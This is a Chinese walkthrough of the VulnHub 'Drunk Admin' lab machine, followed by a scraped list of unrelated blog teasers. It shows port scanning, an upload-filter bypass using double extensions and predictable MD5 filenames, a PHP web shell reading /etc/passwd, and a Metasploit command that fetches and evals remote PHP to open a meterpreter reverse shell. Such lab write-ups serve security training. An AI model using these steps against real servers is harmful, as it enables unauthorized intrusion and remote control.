zhaji001

Drunk Admin

简介：

https://www.vulnhub.com/entry/drunk-admin-web-hacking-challenge-1,14/

环境：

VMware网络选择的桥接模式，根据自己的环境进行配置，

攻击机：kali linux

靶机：Drunk Admin VM

0x001 信息收集

开机你将会看到靶机的IP地址，我的VM靶机地址为192.168.1.104

0x002 端口扫描

TCP端口扫描

nmap -n -A -p- 192.168.1.104
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-08 16:17 CST
Nmap scan report for 192.168.1.104
Host is up (0.0058s latency).
Not shown: 65533 filtered ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 5.5p1 Debian 6+squeeze1 (protocol 2.0)
| ssh-hostkey: 
|   1024 57:a2:04:3d:6e:e5:01:7b:b4:c6:e5:f9:76:25:8a:8a (DSA)
|_  2048 66:9a:ee:a2:2a:1a:59:47:b9:c5:50:da:a6:96:76:16 (RSA)
8880/tcp open  http    Apache httpd 2.2.16 ((Debian))
|_http-server-header: Apache/2.2.16 (Debian)
|_http-title: Tripios
MAC Address: E0:94:67:A1:C9:FD (Intel Corporate)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.26 - 2.6.35, Linux 2.6.32
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   5.80 ms 192.168.1.104

UDP端口扫描没有找到开放的UDP端口

nmap -n -A -sU 192.168.1.104
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-08 16:26 CST
Nmap scan report for 192.168.1.104
Host is up (0.0087s latency).
All 1000 scanned ports on 192.168.1.104 are closed (956) or open|filtered (44)
MAC Address: E0:94:67:A1:C9:FD (Intel Corporate)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   8.66 ms 192.168.1.104

0x003 侦查Web应用

http://192.168.1.104:8880/index.php
http://192.168.1.104:8880/info.php

使用burp suite 中的Spider爬取源码引用的链接

http://192.168.1.104:8880/myphp.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000
http://192.168.1.104:8880/myphp.php?id=102

使用Intruder模块尝试对id数字进行增量，设置payloads set 设置为1 payload type 设置为Numbers ,payload options Numbers

from: 0 to: 1000 step : 1

GET /myphp.php?id=§102§ HTTP/1.1
Host: 192.168.1.104:8880
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: trypios=nop
Connection: close
Upgrade-Insecure-Requests: 1

对响应200长度为345 将显示这样一句话

Try harder, you might find something here. Or not? Who knows.

排序下可看到99,101,102,104,108,116,132,164响应长度不一样，打开URL链接将看到一些敏感信息。

#PHP版本Apache和PHP配置等信息
http://192.168.1.104:8880/myphp.php?id=101
#禁用的PHP函数列表
http://192.168.1.104:8880/myphp.php?id=104

dirb爬取的信息

dirb http://192.168.1.104:8880 -o dirb.log


GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.1.104:8880/ ----
+ http://192.168.1.104:8880/cgi-bin/ (CODE:403|SIZE:291)                             
+ http://192.168.1.104:8880/image (CODE:200|SIZE:1392)                               
==> DIRECTORY: http://192.168.1.104:8880/images/                                     
+ http://192.168.1.104:8880/index (CODE:200|SIZE:1638)                               
+ http://192.168.1.104:8880/index.php (CODE:200|SIZE:1638)                           
+ http://192.168.1.104:8880/info (CODE:200|SIZE:1600)                                
+ http://192.168.1.104:8880/info.php (CODE:200|SIZE:1600)                            
+ http://192.168.1.104:8880/server-status (CODE:403|SIZE:51)                         
==> DIRECTORY: http://192.168.1.104:8880/style/                                      
+ http://192.168.1.104:8880/upload (CODE:200|SIZE:57)                                
                                                                                     
---- Entering directory: http://192.168.1.104:8880/images/ ----
+ http://192.168.1.104:8880/images/admin.php (CODE:403|SIZE:51)                      
+ http://192.168.1.104:8880/images/index (CODE:200|SIZE:0)                           
+ http://192.168.1.104:8880/images/index.html (CODE:200|SIZE:0)                      
+ http://192.168.1.104:8880/images/index.php (CODE:403|SIZE:51)                      
+ http://192.168.1.104:8880/images/info.php (CODE:403|SIZE:51)                       
+ http://192.168.1.104:8880/images/phpinfo.php (CODE:403|SIZE:51)                    
+ http://192.168.1.104:8880/images/xmlrpc.php (CODE:403|SIZE:51)                     
+ http://192.168.1.104:8880/images/xmlrpc_server.php (CODE:403|SIZE:51)              
                                                                                     
---- Entering directory: http://192.168.1.104:8880/style/ ----
+ http://192.168.1.104:8880/style/bullet (CODE:200|SIZE:989)                         
+ http://192.168.1.104:8880/style/index (CODE:200|SIZE:0)                            
+ http://192.168.1.104:8880/style/index.html (CODE:200|SIZE:0)                       
+ http://192.168.1.104:8880/style/style (CODE:200|SIZE:5757)                         
                                                                                     
-----------------

提取出响应为200的URL和爬取到的目录

cat dirb.log | grep "CODE:200" | cut -d" " -f2 > url.txt
~# cat url.txt 
http://192.168.1.104:8880/image
http://192.168.1.104:8880/index
http://192.168.1.104:8880/index.php
http://192.168.1.104:8880/info
http://192.168.1.104:8880/info.php
http://192.168.1.104:8880/upload
http://192.168.1.104:8880/images/index
http://192.168.1.104:8880/images/index.html
http://192.168.1.104:8880/style/bullet
http://192.168.1.104:8880/style/index
http://192.168.1.104:8880/style/index.html
http://192.168.1.104:8880/style/style
~# cat dirb.log | grep "==> DIRECTORY:" | cut -d" " -f3 >> url.txt
~# cat url.txt 
http://192.168.1.104:8880/image
http://192.168.1.104:8880/index
http://192.168.1.104:8880/index.php
http://192.168.1.104:8880/info
http://192.168.1.104:8880/info.php
http://192.168.1.104:8880/upload
http://192.168.1.104:8880/images/index
http://192.168.1.104:8880/images/index.html
http://192.168.1.104:8880/style/bullet
http://192.168.1.104:8880/style/index
http://192.168.1.104:8880/style/index.html
http://192.168.1.104:8880/style/style
http://192.168.1.104:8880/images/
http://192.168.1.104:8880/style/

使用Eyewitness快速截取URL

eyewitness --web -f /root/url.txt

生成HTML报告

################################################################################
#                                  EyeWitness                                  #
################################################################################
#           FortyNorth Security - https://www.fortynorthsecurity.com           #
################################################################################

Starting Web Requests (14 Hosts)
Attempting to screenshot http://192.168.1.104:8880/image
Attempting to screenshot http://192.168.1.104:8880/index
Attempting to screenshot http://192.168.1.104:8880/index.php
Attempting to screenshot http://192.168.1.104:8880/info
Attempting to screenshot http://192.168.1.104:8880/info.php
Attempting to screenshot http://192.168.1.104:8880/upload
Attempting to screenshot http://192.168.1.104:8880/images/index
Attempting to screenshot http://192.168.1.104:8880/images/index.html
Attempting to screenshot http://192.168.1.104:8880/style/bullet
Attempting to screenshot http://192.168.1.104:8880/style/index
Attempting to screenshot http://192.168.1.104:8880/style/index.html
Attempting to screenshot http://192.168.1.104:8880/style/style
Attempting to screenshot http://192.168.1.104:8880/images/
Attempting to screenshot http://192.168.1.104:8880/style/
Finished in 23.0011031628 seconds

[*] Done! Report written in the /usr/share/eyewitness/01082019_182606 folder!
Would you like to open the report now? [Y/n] Y

文件路径默认在file:///usr/share/eyewitness/01082019_182606/report.html

0x004 文件上传

#URL
http://192.168.1.104:8880/

先上传一个test.png图片看下服务器的响应结果

http://192.168.1.104:8880/images/364be8860e8d72b4358b5e88099a935a.png

可以看到文件名被修改为364be8860e8d72b4358b5e88099a935a.png

在此上传这张图片看服务器处理的结果

http://192.168.1.104:8880/images/364be8860e8d72b4358b5e88099a935a.png

和第一次上传的文件名一样，可以发现不是基于时间戳作为种子进行模糊处理

364be8860e8d72b4358b5e88099a935a 看起来像是MD5

~# hash-identifier
   #########################################################################
   #	 __  __ 		    __		 ______    _____	   #
   #	/\ \/\ \		   /\ \ 	/\__  _\  /\  _ `\	   #
   #	\ \ \_\ \     __      ____ \ \ \___	\/_/\ \/  \ \ \/\ \	   #
   #	 \ \  _  \  /'__`\   / ,__\ \ \  _ `\	   \ \ \   \ \ \ \ \	   #
   #	  \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \	    \_\ \__ \ \ \_\ \	   #
   #	   \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/	   #
   #	    \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.1 #
   #								 By Zion3R #
   #							www.Blackploit.com #
   #						       [email protected] #
   #########################################################################

   -------------------------------------------------------------------------
 HASH: 364be8860e8d72b4358b5e88099a935a

Possible Hashs:
[+]  MD5
[+]  Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

对文件进行MD5编码看是否得到364be8860e8d72b4358b5e88099a935a.png

echo -n "test" | md5sum
098f6bcd4621d373cade4e832627b4f6  -

echo -n "test.png" | md5sum
364be8860e8d72b4358b5e88099a935a  - #是MD5 hash 而且还包含扩展名

0x005 文件上传绕过

上传一个file.php文件试下 Invalid file extension!

file.pHp 也不允许上传此文件

file.php.png 双扩展名允许上传因为这是一个图片，有.png扩展名和图片MIME类型。

使用burp拦截修改扩展名也失败

-----------------------------96243593515911303681275160265
Content-Disposition: form-data; name="image"; filename="file.php"
Content-Type: image/png


-----------------------------96243593515911303681275160265
Content-Disposition: form-data; name="Submit"

Host My Awesome Image
-----------------------------96243593515911303681275160265--

修改MIME类型可以成功但是不能作为php代码执行

-----------------------------1597954536791357711048303406
Content-Disposition: form-data; name="image"; filename="file.php.png"
Content-Type: application/x-php


-----------------------------1597954536791357711048303406
Content-Disposition: form-data; name="Submit"

Host My Awesome Image
-----------------------------1597954536791357711048303406--

%00截断也无效

尝试不同的双重扩展名 file.png.php 可以上传上传后没显示链接

上传的文件都在images/ 目录下

http://192.168.1.104:8880/images/

知道了是MD5 hash 而且还包含扩展名

echo -n "file.png.php" | md5sum
34b17a2b0c9eac3da052f84d03285ee9  -

访问URL 代码被执行了

http://192.168.1.104:8880/images/34b17a2b0c9eac3da052f84d03285ee9.php

0x006 漏洞利用

访问URL 敏感信息泄漏可以看到system，passthru和shell_exec 等被禁用了，但是exec并没有禁用

http://192.168.1.104:8880/myphp.php?id=104

使用kali linux 中的webshells

/usr/share/webshells/php/simple-backdoor.php

修改扩展名和名字

mv simple-backdoor.php webshell.png.php

对文件MD5 hash 编码

echo -n "webshell.png.php" | md5sum
5b796592a44f0865c778cbd83d10e58e  -

访问URL 代码执行

http://192.168.1.104:8880/images/5b796592a44f0865c778cbd83d10e58e.php?cmd=cat+/etc/passwd

这段代码需要修改为



";
        $cmd = ($_REQUEST['cmd']);
        exec($cmd, $results);
        foreach( $results as $r )
        {
                echo $r."
";
        }
        echo "

";
        die;
}
?>

Usage: http://192.168.1.104:8880/images/5b796592a44f0865c778cbd83d10e58e.php?cmd=cat+/etc/passwd

URL

http://192.168.1.104:8880/images/5b796592a44f0865c778cbd83d10e58e.php?cmd=ls%20-al


total 248
drwxrwxr-x 2 root     www-data   4096 Jan  8 13:57 .
drwxr-xr-x 4 root     root       4096 Apr  2  2012 ..
-rw-r--r-- 1 root     root        143 Mar  3  2012 .htaccess
-rw-r--r-- 1 www-data www-data     29 Jan  8 13:25 13f8494b07ca1c8fc9e1b4aa87152a0a.png
-rw-r--r-- 1 www-data www-data     29 Jan  8 13:29 34b17a2b0c9eac3da052f84d03285ee9.php
-rw-r--r-- 1 www-data www-data  16554 Jan  8 12:53 364be8860e8d72b4358b5e88099a935a.png
-rw-r--r-- 1 www-data www-data 166311 Mar  7  2012 3df5758863d650e59525cf2aa0676230.png
-rw-r--r-- 1 www-data www-data    453 Jan  8 14:45 5b796592a44f0865c778cbd83d10e58e.php
-rw-r--r-- 1 www-data www-data   7205 Mar  7  2012 8dc053a3ed0adf03994f96347d20d9e5.png
-rw-r--r-- 1 www-data www-data  21764 Mar  4  2012 aa63b1c597b45e4f1f883724d0f8dfbe.jpg
-rw-r--r-- 1 www-data www-data     29 Jan  8 13:27 d2714a8696971337c0bbf8bafab83164.png
-rw-r--r-- 1 root     root          0 Mar  3  2012 index.html

0x007 Meterpreter

URL

http://192.168.1.104:8880/images/5b796592a44f0865c778cbd83d10e58e.php?cmd=php%20-d%20allow_url_fopen=true%20-r%20%22eval(file_get_contents(%27http://192.168.1.103:8181/LhMvEjkBoBuR54%27));%22

msf

msf > use multi/script/web_delivery
msf exploit(multi/script/web_delivery) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set lhost  192.168.1.103
lhost => 192.168.1.103
msf exploit(multi/script/web_delivery) > set srvport 8080
srvport => 8080
msf exploit(multi/script/web_delivery) > set target 1
target => 1
msf exploit(multi/script/web_delivery) > exploit 
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.1.103:4444 
msf exploit(multi/script/web_delivery) > [*] Using URL: http://0.0.0.0:8181/LhMvEjkBoBuR54
[*] Local IP: http://192.168.1.103:8181/LhMvEjkBoBuR54
[*] Server started.
[*] Run the following command on the target machine:
php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.1.103:8181/LhMvEjkBoBuR54'));"
[*] 192.168.1.104    web_delivery - Delivering Payload
[*] Sending stage (38247 bytes) to 192.168.1.104
msf exploit(multi/script/web_delivery) > sessions 

Active sessions
===============

  Id  Name  Type                   Information               Connection
  --  ----  ----                   -----------               ----------
  1         meterpreter php/linux  www-data (33) @ drunkadm  192.168.1.103:4444 -> 192.168.1.104:38262 (192.168.1.104)
  2         meterpreter php/linux  www-data (33) @ drunkadm  192.168.1.103:4444 -> 192.168.1.104:38264 (192.168.1.104)

msf exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > pwd
/var/www/images
meterpreter > shell
Process 2928 created.
Channel 1 created.
ls -al
total 48
drwxr-xr-x  4 root root     4096 Apr  2  2012 .
drwxr-xr-x 14 root root     4096 Mar  3  2012 ..
-rw-r--r--  1 root root      217 Mar  3  2012 .htaccess
-rw-r--r--  1 root root      322 Mar  6  2012 .proof
-rw-r--r--  1 root root     2683 Mar  7  2012 image.php
drwxrwxr-x  2 root www-data 4096 Jan  8 13:57 images
-rw-r--r--  1 root root     1981 Mar  4  2012 index.php
-rw-r--r--  1 root root     1943 Mar  4  2012 info.php
-rw-r--r--  1 root root      279 Mar  4  2012 myphp.php
drwxr-xr-x  2 root root     4096 Mar  3  2012 style
-rw-r--r--  1 root root     2144 Mar  7  2012 upload.php
-rw-r--r--  1 root root       51 Mar  3  2012 xmm.html
cat .proof
#########################
# Drunk Admin Challenge #
#     by @anestisb	#
#########################

bob> Great work.
bob> Meet me there.
...> ?
bob> What? You don't know where?
bob> Work a little more your post
     exploitation skills.

Secret Code:
TGglMUxecjJDSDclN1Ej

Mail me your methods at:
[email protected]

总结：

通过对敏感信息的查找，在到对文件上传点进行分析，拿到了webshell。此靶机的目的还是没看太懂，因为英语不好，只是拿到了webshell。

CISP-PTE考试通关经验 Python_chichi 互联网职业发展科技 android
考试题型考试题型氛围选择题（20分）+基础题（50分）+综合题（三个key30分），70分以上通过，也就是选择题保证10分以上，基础题全做出来的话，至少要做出综合题第一道小题。一、选择题主要考察基础知识，前四天老师都有讲，另外还发了一些题库，看一遍的话，基本考10分以上问题不大。二、基础题1.sql注入第一题sql注入是一个文章发表系统，培训的时候靶机练习有做过，但是不太一样，注册用户登录之后，注
Gaara靶机练习郑居中3.0 Gaara靶机 gdb提权
渗透测试一.信息收集1.确定IP地址2.nmap扫描3.目录扫描二.hydra爆破1.ssh连接2.信息探索三.提权gdb提权提权一.信息收集1.确定IP地址┌──(root㉿kali)-[~/kali/web]└─#arp-scan-lInterface:eth0,type:EN10MB,MAC:00:0c:29:10:3c:9b,IPv4:192.168.9.10Startingarp-sca
Neos的渗透测试靶机练习——DarkHole-2 Dr.Neos 靶场练习渗透测试网络安全 sql git 服务器
DarkHole-2一、实验环境二、开始渗透1.搜集信息2.git文件泄露3.SQL注入4.提权三、总结一、实验环境虚拟机软件：VirtualBox攻击机：kalilinux（网卡初始为仅主机模式，要有安全意识）靶机：DarkHole-2（网卡初始为仅主机模式，要有安全意识）靶机网卡有问题需要提前修改，进入系统前先按shift，然后按e进入编辑模式，将ro至initrd之前的内容修改为rwsing
Neos的渗透测试靶机练习——DarkHole-1 Dr.Neos 靶场练习网络安全渗透测试网络安全 web安全
DarkHole-1一、实验环境二、开始渗透1.搜集信息2.sql注入4.提权三、总结一、实验环境虚拟机软件：VirtualBox攻击机：kalilinux（网卡初始为仅主机模式，要有安全意识）靶机：DarkHole-1（网卡初始为仅主机模式，要有安全意识）靶机网卡有问题需要提前修改，进入系统前先按shift，然后按e进入编辑模式，将ro至initrd之前的内容修改为rwsingleinit=/b
Neos的渗透测试靶机练习——DC-8 Dr.Neos 靶场练习网络服务器渗透测试安全网络安全
DC-8一、实验环境二、开始渗透1.搜集信息2.sql注入（1）测试注入点（4）sqlmap3.PHP上传，反弹shell4.提权三、总结一、实验环境虚拟机软件：VirtualBox攻击机：kalilinux（网卡初始为仅主机模式，要有安全意识）靶机：DC-8（网卡初始为仅主机模式，要有安全意识）二、开始渗透1.搜集信息输入sudosu，将kali切换到root权限；输入ifconfig查询自身i
Neos的渗透测试靶机练习——DC-9 Dr.Neos 靶场练习网络服务器渗透测试安全网络安全
DC-9一、实验环境二、开始渗透1.搜集信息2.sql注入3.文件包含漏洞4.提权三、总结一、实验环境虚拟机软件：VirtualBox攻击机：kalilinux（网卡初始为仅主机模式，要有安全意识）靶机：DC-9（网卡初始为仅主机模式，要有安全意识）二、开始渗透1.搜集信息输入sudosu，将kali切换到root权限；输入ifconfig查询自身ip，即攻击机ip；可以看到自身ip为192.16
Neos的渗透测试靶机练习——DC-7 Dr.Neos 靶场练习网络安全渗透测试网络安全 web安全
DC-7一、实验环境二、开始渗透1.搜集信息2.文件上传3.提权三、总结一、实验环境虚拟机软件：VirtualBox攻击机：kalilinux（网卡初始为仅主机模式，要有安全意识）靶机：DC-7（网卡初始为仅主机模式，要有安全意识）二、开始渗透1.搜集信息输入sudosu，将kali切换到root权限；输入ifconfig查询自身ip，即攻击机ip；可以看到自身ip为192.168.56.101。
Neos的渗透测试靶机练习——DC-5 Dr.Neos 靶场练习安全渗透测试网络安全 web安全网络
DC-5一、实验环境二、开始渗透1.搜集信息2.文件包含漏洞3.反弹shell三、总结一、实验环境虚拟机软件：VirtualBox攻击机：kalilinux（网卡初始为仅主机模式，要有安全意识）靶机：DC-5（网卡初始为仅主机模式，要有安全意识）二、开始渗透1.搜集信息输入sudosu，将kali切换到root权限；输入ifconfig查询自身ip，即攻击机ip；可以看到自身ip为192.168.
Neos的渗透测试靶机练习——Wakanda Dr.Neos 靶场练习安全渗透测试网络安全 web安全
Wakanda一、实验环境二、开始渗透（根据流程学习思路）1.获知本机IP、靶机IP2.靶机端口、协议、前端信息（Nmap）3.进入后台，查看敏感数据三、总结一、实验环境虚拟机软件：VirtualBox攻击机：KaliLinux（仅主机模式）靶机：Wakanda（仅主机模式，共有3个flag）二、开始渗透（根据流程学习思路）1.获知本机IP、靶机IP切换到root用户（输入sudosu及对应的密码
Neos的渗透测试靶机练习——DC-3 Dr.Neos 靶场练习网络安全渗透测试网络安全 web安全
DC-3一、实验环境二、开始渗透1.搜集信息2.sqlmap3.上传PHP木马三、总结一、实验环境虚拟机软件：VirtualBox攻击机：kalilinux（网卡初始为仅主机模式，要有安全意识）靶机：DC-3（网卡初始为仅主机模式，要有安全意识）二、开始渗透1.搜集信息输入sudosu，将kali切换到root权限；输入ifconfig查询自身ip，即攻击机ip；可以看到自身ip为192.168.
渗透测试-靶机DC-2-知识点总结 Dr.Neos 靶机-知识点总结安全渗透测试网络安全 web安全网络
靶机DC-2-知识点总结一、前言二、实验环境三、渗透测试工具1.cewl（1）cewl简介（2）cewl常见用法2.wpscan（1）wpscan简介（2）wpscan常见用法直接扫描-eu爆破用户名-U、-P爆破账户密码3.dirb（1）dirb简介（2）dirb常见用法四、渗透测试技巧1.rbash逃逸2.git提权五、总结一、前言本次渗透测试具体流程详见Neos的渗透测试靶机练习——DC-2
hackmyvm Rei靶机练习活着Viva hackmyvm 渗透测试
主机发现端口扫描漏洞挖掘权限提升主机发现攻击机ip靶机ip-sn发送arp请求包探测目标ip是否在线端口扫描-p-所有端口扫描-sV查询开放端口的服务这里65333是ssh服务，63777是http服务最好拿个记事本记住漏洞挖掘浏览靶机的默认页面，查查有什么漏洞它说indexp.txt在web的默认目录，那我访问一下。indexp.txt下显示了哪些目录可以访问，哪些目录不可以访问，类似于robo
vulnhub靶机练习-Os-hackNos Asson
0x01靶机简介Difficulty:EasytoIntermediateFlag:2FlagfirstuserAndsecondrootLearning:exploit|WebApplication|Enumeration|PrivilegeEscalationWebsite:www.hackNos.commail:[email protected]靶机下载https://www.vulnh
Linux靶机练习小小西贝 Linux Web安全靶机练习安全网络安全 linux
文章目录第1次Lampiao1.信息收集1.1netdiscover扫描1.2namp扫描第1次扫描第2次扫描1.3御剑扫描打开扫描到的文件打开登录网站sql注入链接跳转node/1node/3node/22.漏洞探测2.1利用cewl获取网站信息2.2ssh进行登录查看靶机信息：3.提权3.1利用脏牛提权3.2对40847文件的操作3.3tiago用户下载40847.cpp文件3.4获取root
靶机练习2之利用Linux版本内核漏洞实现本地权限提升 yuan_boss 保护国家网络安全 linux ubuntu 靶机本地权限提升漏洞 kali
文章目录信息收集1.扫描网段2.扫描敏感目录渗透阶段密码爆破查看主机内核查找版本漏洞查看漏洞详细信息拷贝漏洞到本地将漏洞文件传到靶机漏洞利用信息收集1.扫描网段建议开启两个终端，首尾扫描，提高速度与准确性从0开始扫描nmap10.9.136.0/24从后面开始扫描nmap-r10.9.136.0/24扫描完成后，发现有个主机10.9.136.231开放了80端口，直接访问该主机，发现只有一个图片，
Vulnhub-Raven1 靶机练习 GloryGod Vulnhub 网络安全网络安全
靶机地址：Raven:1~VulnHub1.基本信息Kali：192.168.26.131靶机：192.168.26.1362.信息收集arp-scan-l或者nmap-sn192.168.26.0/24之后进行全端口扫描，保证自己的隐蔽性（假设真实环境）nmap-sT--min-rate10000-p-192.168.26.136-oA./nmap_report/raven1/port紧接着进行
靶机练习 No.23 Vulnhub靶机DarkHole 2 .git信息泄露 .bash_history历史命令提权 LuckyCharm~ 靶机学习安全
靶机练习No.23Vulnhub靶机DarkHole20x00环境准备0x01信息收集步骤一：ip探测步骤二：端口扫描0x02漏洞挖掘思路一：web漏洞挖掘（.git信息收集）思路二：22ssh爆破步骤一：githack.py收集.git步骤二：从git仓库审查代码及数据库文件（1）config/config.php（2）审计index.phplogin.phpdashboard.php步骤三：g
【靶机练习】Vulnhub靶场Earth-练习记录小白帽的成长网络安全渗透测试 linux 服务器 centos
注：靶机开机前需要在虚拟机设置关闭USB，否则靶机无法打开信息收集攻击机IP：192.168.43.118主机发现：sudonmap-sP192.168.43.1/24确认目标机IP：192.168.43.241端口扫描：sudonmap-sC-sV-p-192.168.43.241扫描结果：目标机开了22端口和80端口，80端口中配置了两个DNS，需要修改hosts文件指定IP。没修改hosts
SQL注入靶机练习：BUU SQL COURSE 1 燕麦葡萄干渗透测试学习渗透测试 SQL注入 BUUCTF
SQL注入靶机练习：BUUSQLCOURSE1一、SQL注入知识点二、前置知识三、SQL注入测试的一般步骤四、解题过程一、SQL注入知识点可参考SQL注入详解二、前置知识参考来源：渗透攻防Web篇-深入浅出SQL注入mysql5.0以上版本中存在一个重要的系统数据库information_schema，通过此数据库可访问mysql中存在的数据库名、表名、字段名等元数据。information_sc
Vulnhub靶场-DC-1靶机练习 .风溪. DC靶机
Vulnhub-DC-1daoyuan##零、环境配置1、虚拟机：vmware15.5.62、攻击环境：kalilinux2020.3192.168.143.1283、靶机：DC-1靶机直接从虚拟机wmware中打开，注意将网络适配器改为nat模式。一、攻击过程一、主机存活扫描arp-scan-l探测到目标ip:192.168.143.134二、端口扫描namp-A-p-192.168.143.1
Vulnhub靶场-DC-2靶机练习 .风溪. DC靶机
Vulnhub-DC-2daoyuan零、环境配置1、虚拟机：vmware15.5.62、攻击环境：kalilinux2020.3192.168.143.1283、靶机：DC-2靶机直接从虚拟机wmware中打开，注意将网络适配器改为nat模式。一、信息收集1、主机存活扫描arp-scan-l2、端口扫描nmap-A-p-192.168.143.135发现开放的端口以及服务80wordpress7
JIS-CTF: VulnUpload 靶机练习 yemansleep
1.靶机介绍VM名称：JIS-CTF：VulnUpload难度：初学者说明：此机器上有五个标志。试着找到它们。平均需要1.5小时才能找到所有旗帜。2.信息收集2.1对靶机进行端口扫描，发现只有80，22端口开放image.png2.2查看网站的robots.txt发现有如下目录User-agent:*Disallow:/Disallow:/backupDisallow:/adminDisallow
做一个靶机练习_djinn 五行缺金 golang
前几天一直在背资料，背的很烦，找个靶机来玩玩.第一件事，先找一下主机地址，由于我在自己的局域网内，我不用扫也知道这台刚开的主机ip是多少...但如果不知道的话，可以用nmap检测一下,sS是指用半开放式扫描，不会完成三次握手，速度要快一点sudonmap-sS192.168.1.0/24扫描结果如下Nmapscanreportfordjinn(192.168.1.8)Hostisup(0.0001
做一个靶机练习_djinn 五行缺金 golang
前几天一直在背资料，背的很烦，找个靶机来玩玩.第一件事，先找一下主机地址，由于我在自己的局域网内，我不用扫也知道这台刚开的主机ip是多少...但如果不知道的话，可以用nmap检测一下,sS是指用半开放式扫描，不会完成三次握手，速度要快一点sudonmap-sS192.168.1.0/24扫描结果如下Nmapscanreportfordjinn(192.168.1.8)Hostisup(0.0001
渗透测试靶机练习（一）之lazysysadmin 不断积淀渗透测试
lzaysysadmin情报搜集主机发现，使用netdiscover主机扫描，使用nmap使用dirbuster进行网站目录扫描可以看到扫描结果，有workpress和phpmyadmin登录网站，查看robots.txt文件存在目录遍历漏洞，但是没有发现可用信息可以尝试爆破一下phpmyadmin的登录口令和wpscan扫描一下主机扫描中发现445端口共享文件发现三个共享的文件夹Linux下挂载
DC-5靶机练习水中煮鱼冒气靶机练习
DC-5靶机练习文件下载链接第一部分信息收集第一步信息收集第二步扫描开放的端口第三步访问80端口[打开Contact页面，发现是一个留言板块，在留言板块输入内容并提交]第四步：观察网页第二部分文件包含漏洞第一步：使用BurpSuite抓包，爆破后台页面[发现存在index.php，solutions.php，about-us.php，faq.php，contact.php，thankyou.php
靶机练习 - ATT&CK红队实战靶场 - 1. 环境搭建和漏洞利用 Sally_Zhang
最近某个公众号介绍了网上的一套环境，这个环境是多个Windows靶机组成的，涉及到内网渗透，正好Windows和内网渗透一直没怎么接触过，所以拿来学习下。下载地址：http://vulnstack.qiyuanxuetang.net/vuln/detail/2/环境配置和检查加上kali一共四台虚拟机。win7x64需要配置两张网卡，一个在内网网段，一个在外网网段，配置如下(VM默认只有一张网卡，
Pikachu 通关笔记 BROTHERYY 靶场练习
Pikachu靶机练习1、暴力破解1.1基于表单的暴力破解1.2验证码绕过(onserver)1.3验证码绕过(onclient)1.4验证码绕过(token防爆破)2、Cross-SiteScripting-XSS2.1反射型(get)2.2反射型(post)2.3存储型xss2.4DOM型xss2.5DOM型xss-x2.6XSS之盲打2.7XSS之过滤2.8xss之htmlspecialch
DC-1入门练习 Mr H
**渗透测试入门靶机练习DC-1**大家好！第一次搭建自己的博客，对这个环境有点陌生，作为一名网络安全学习者很高兴为大家提供一些踩坑经验以及学习教程如有不足，或错误还请大家指点。#环境搭建1.首先准备好DC-1靶机，其实就是一个虚拟机ova文件下载地址：https://download.vulnhub.com/dc/DC-1.zip其他DC靶机地址只需修改上面DC-后面数字即可2.打开次虚拟机创建
LazySysAdmin 渗透靶机练习林家大公子渗透学习
下载链接：https://www.vulnhub.com/entry/lazysysadmin-1,205/扫描目标主机...省略输出有用的信息包括：http://x.x.x.x/phpmyadmin/http://x.x.x.x/wordpress/wp-adminhttp://x.x.x.x/wordpress/找到疑似用户名的：togie使用enum4linuxx.x.x.x，查找有用信息。
多线程编程之理财周凡杨 java 多线程生产者消费者理财
现实生活中，我们一边工作，一边消费，正常情况下会把多余的钱存起来，比如存到余额宝，还可以多挣点钱，现在就有这个情况：我每月可以发工资20000万元（暂定每月的1号），每月消费5000（租房+生活费）元（暂定每月的1号），其中租金是大头占90%，交房租的方式可以选择（一月一交，两月一交、三月一交），理财：1万元存余额宝一天可以赚1元钱，
[Zookeeper学习笔记之三]Zookeeper会话超时机制 bit1129 zookeeper
首先，会话超时是由Zookeeper服务端通知客户端会话已经超时，客户端不能自行决定会话已经超时，不过客户端可以通过调用Zookeeper.close()主动的发起会话结束请求，如下的代码输出内容 Created /zoo-739160015 CONNECTEDCONNECTED .............CONNECTEDCONNECTED CONNECTEDCLOSEDCLOSED
SecureCRT快捷键 daizj secureCRT 快捷键
ctrl + a : 移动光标到行首ctrl + e ：移动光标到行尾crtl + b: 光标前移1个字符crtl + f: 光标后移1个字符crtl + h : 删除光标之前的一个字符ctrl + d ：删除光标之后的一个字符crtl + k ：删除光标到行尾所有字符crtl + u : 删除光标至行首所有字符crtl + w: 删除光标至行首
Java 子类与父类这间的转换周凡杨 java 父类与子类的转换
最近同事调的一个服务报错，查看后是日期之间转换出的问题。代码里是把 java.sql.Date 类型的对象强制转换为 java.sql.Timestamp 类型的对象。报java.lang.ClassCastException。代码：
可视化swing界面编辑朱辉辉33 eclipse swing
今天发现了一个WindowBuilder插件，功能好强大，啊哈哈，从此告别手动编辑swing界面代码，直接像VB那样编辑界面，代码会自动生成。首先在Eclipse中点击help，选择Install New Software,然后在Work with中输入WindowBui
web报表工具FineReport常用函数的用法总结（文本函数）老A不折腾 finereport web报表工具报表软件 java报表
